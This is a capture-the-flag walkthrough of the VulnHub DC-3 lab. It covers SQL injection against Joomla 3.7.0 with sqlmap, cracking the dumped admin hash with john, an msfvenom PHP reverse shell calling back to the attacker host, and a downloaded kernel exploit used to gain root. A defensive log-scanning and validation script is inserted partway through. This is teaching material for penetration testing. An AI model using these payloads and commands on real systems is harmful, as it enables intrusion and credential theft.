DC-3 Walkthrough

Description from Vulnhub

DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).

If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

Scanning

After the initial port scanning, I discovered only one port. It looks like a CMS, more specifically Joomla.

root :: ~/Downloads » nmap -A -p- 192.168.43.207
Nmap scan report for DC-3 (192.168.43.207)
Host is up (0.0020s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home

Enumeration

I ran joomscan on the site, which is a popular Joomla scanner. I was able to determine the version and locate the administrator page. That’s all.

root :: ~/Downloads » joomscan --url 192.168.43.207
    ____  _____  _____  __  __  ___   ___    __    _  _
(_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
.-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
            (1337.today)

    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.43.207 ...

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.43.207/administrator/components
http://192.168.43.207/administrator/modules
http://192.168.43.207/administrator/templates
http://192.168.43.207/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.43.207/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found

There is not much clue to follow, so let’s search for the version number.

root :: ~/Downloads » searchsploit Joomla 3.7.0
------------------------------------------- ----------------------------------------
Exploit Title                              |  Path
                                           | (/usr/share/exploitdb/)
------------------------------------------- ----------------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | exploits/php/webapps/42033.txt
------------------------------------------- ----------------------------------------
Shellcodes: No Result

Now, we’re going somewhere… I mirrored the text file to my home directory and printed its content out.

root :: ~/Downloads » searchsploit -m exploits/php/webapps/42033.txt
Exploit: Joomla! 3.7.0 - 'com_fields' SQL Injection
    URL: https://www.exploit-db.com/exploits/42033
    Path: /usr/share/exploitdb/exploits/php/webapps/42033.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /root/42033.txt

root :: /root » cat 42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

Exploiting an SQL Injection

The author included an example with sqlmap, and I made use of that line. I copied it, but modified the IP address, removed the --dbs and -p list[fullordering] switches, and added --dump to dump the database. I cut out a lot of the output because it would be way too much.

root :: ~ » sqlmap -u "http://192.168.43.207/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dump

--- snip ---

[12:27:55] [WARNING] unable to retrieve column names for table '#__users' in database 'joomladb'
do you want to use common column existence check? [y/N/q] y
which common columns (wordlist) file do you want to use?
[1] default '/usr/local/Cellar/sqlmap/1.3.5/libexec/txt/common-columns.txt' (press Enter)
[2] custom
[12:28:01] [INFO] checking column existence using items from '/usr/local/Cellar/sqlmap/1.3.5/libexec/txt/common-columns.txt'
[12:28:01] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 5
[12:28:05] [INFO] starting 5 threads
[12:28:05] [INFO] retrieved: id
[12:28:05] [INFO] retrieved: name
[12:28:05] [INFO] retrieved: username
[12:28:05] [INFO] retrieved: email
[12:28:08] [INFO] retrieved: password
[12:28:40] [INFO] retrieved: params

[12:28:49] [INFO] fetching entries for table '#__users' in database 'joomladb'
[12:28:49] [INFO] used SQL query returns 1 entry
[12:28:49] [INFO] retrieved: 'freddy@norealaddress.net'
[12:28:49] [INFO] retrieved: '629'
[12:28:49] [INFO] retrieved: 'admin'
[12:28:49] [INFO] retrieved: '{"admin_style":"","admin_language":"","language":"","editor":"","helpsite":"","timezone":""}'
[12:28:49] [INFO] retrieved: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
[12:28:49] [INFO] retrieved: 'admin'
Database: joomladb
Table: #__users

After checking the columns of the #__users table, sqlmap printed out everything related to the admin user.
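The list[fullordering] value is only ever meant to be a column name plus a sort direction, so the defensive checks fall out of that directly. The block below is an added example, not code from the walkthrough or from Joomla: an allow-list validator for the ordering value (the same shape of check a hardened model would apply before building ORDER BY), plus a scanner that runs it over Apache access-log lines to spot probes against com_fields. The log lines are constructed for the example; the regex, function names and the 500/200 status codes are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Expected shape of list[fullordering]: "<column> <ASC|DESC>", e.g. "a.ordering ASC".
SAFE_FULLORDERING = re.compile(
    r"[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)? (ASC|DESC)", re.IGNORECASE)

def is_safe_fullordering(value: str) -> bool:
    """True only for a plain column/direction pair; anything else is rejected."""
    return SAFE_FULLORDERING.fullmatch(value) is not None

def order_by_clause(value: str) -> str:
    """Hardened form: build ORDER BY only from an allow-listed value, never by concatenation."""
    if not is_safe_fullordering(value):
        raise ValueError("rejected ordering value: %r" % value)
    column, direction = value.rsplit(" ", 1)
    return "ORDER BY %s %s" % (column, direction.upper())

# Apache combined log format (client, timestamp, request line, status, bytes, referer, agent).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)'
                    r' [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def scan_access_log(lines):
    """Return (client, timestamp, decoded value) for every com_fields request whose
    list[fullordering] fails the allow-list. Keyed off the parameter, not the
    User-Agent, because sqlmap's --random-agent makes the agent string useless."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m["target"]).query)  # decodes %5B..%5D keys and %27 values
        if qs.get("option", [""])[0] != "com_fields":
            continue
        for ordering in qs.get("list[fullordering]", []):
            if not is_safe_fullordering(ordering):
                hits.append((m["ip"], m["ts"], ordering))
    return hits

# Constructed sample log: one legitimate sort, the advisory's updatexml' probe, one sqlmap
# time-based payload, and an unrelated component that must not be flagged.
SAMPLE_LOG = [
    '192.168.43.50 - - [02/Jun/2019:12:27:55 +0200] "GET /index.php?option=com_fields&view=fields&list%5Bfullordering%5D=a.ordering%20ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.43.2 - - [02/Jun/2019:12:27:58 +0200] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%27 HTTP/1.1" 500 2048 "-" "Mozilla/5.0"',
    '192.168.43.2 - - [02/Jun/2019:12:28:05 +0200] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))GDiu) HTTP/1.1" 200 1024 "-" "Opera/9.80"',
    '192.168.43.60 - - [02/Jun/2019:12:29:00 +0200] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, value in scan_access_log(SAMPLE_LOG):
        print("suspicious com_fields ordering from %s at %s: %r" % (ip, ts, value))
```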

Cracking the hash

I let john crack the hash. The process was extremely fast and I got the admin password.

root :: ~ » nvim hash.txt
root :: ~ » john hash.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
snoopy           (?)
1g 0:00:00:00 DONE 2/3 (2019-06-02 10:41) 2.272g/s 81.81p/s 81.81c/s 81.81C/s a1b2c3..buster
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Reverse shell

I quickly generated a PHP reverse shell with msfvenom.

root :: ~/Downloads » msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.2 LPORT=9898 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1113 bytes

Before uploading the reverse shell, I also set up the corresponding handler with Metasploit.

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.2
lhost => 192.168.43.2
msf5 exploit(multi/handler) > set lport 9898
lport => 9898
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.2:9898

Then, I navigated to 192.168.43.207/templates/protostar/shell.php and got a connection back.

Privilege escalation

I usually go for the LinEnum.sh shell script for exploring the interesting things on the box.

meterpreter > cd /tmp
meterpreter > shell
Process 1624 created.
Channel 0 created.
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2019-06-02 22:39:19--  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.12.133, 64:ff9b::9765:7085
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.12.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45639 (45K) [text/plain]
Saving to: 'LinEnum.sh'

    0K .......... .......... .......... .......... ....      100%  450K=0.1s

2019-06-02 22:39:20 (450 KB/s) - 'LinEnum.sh' saved [45639/45639]

chmod +x LinEnum.sh
./LinEnum.sh

I couldn’t find misconfigured services, SUID executables, etc., so it was time to search for version numbers again. Maybe I’ll find a kernel exploit?! I copied the relevant information from the script output.

[-] Kernel information:
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux


[-] Kernel information (continued):
Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial

Searching for kernel exploit

I searched for the distribution release number and added the term exploitdb. The second search result looked promising, so I decided to try it out! Here is the link: https://www.exploit-db.com/exploits/39772. The description is very straightforward; it even gives you the necessary files (link at the end) and a usage example.

I was operating with a non-interactive shell, so I upgraded it to a pseudo-TTY with Python and downloaded the exploit files.

python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-3:/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2019-06-02 22:53:57--  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 140.82.118.3, 64:ff9b::8c52:7603
Connecting to github.com (github.com)|140.82.118.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2019-06-02 22:53:58--  https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.112.133, 64:ff9b::9765:7085
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.112.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

39772.zip           100%[===================>]   6.86K  --.-KB/s    in 0s

2019-06-02 22:53:59 (66.1 MB/s) - '39772.zip' saved [7025/7025]

www-data@DC-3:/tmp$ 

Since we got a zipped file, we have to extract it.

www-data@DC-3:/tmp$ unzip 39772.zip
Archive:  39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
www-data@DC-3:/tmp$ cd 39772
www-data@DC-3:/tmp/39772$ ls
crasher.tar  exploit.tar

We have to extract the exploit.tar file too.

www-data@DC-3:/tmp/39772$ tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp/39772$ ls
crasher.tar  ebpf_mapfd_doubleput_exploit  exploit.tar
www-data@DC-3:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput.c  hello.c  suidhelper.c

I got all the required files, time to compile the exploit.

www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
            ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
            ^

Finally, run the exploit and hope for the best!

www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),33(www-data)

The exploit was successful and I got root privileges. Yayyy! Now, let’s get the flag!

root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
root@DC-3:/root# ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
__        __   _ _   ____                   _ _ _ _
\ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!
root@DC-3:/root#

Before you go

If you found this article helpful, please share it to help others with similar interests find it! Feedback and donations are always welcome!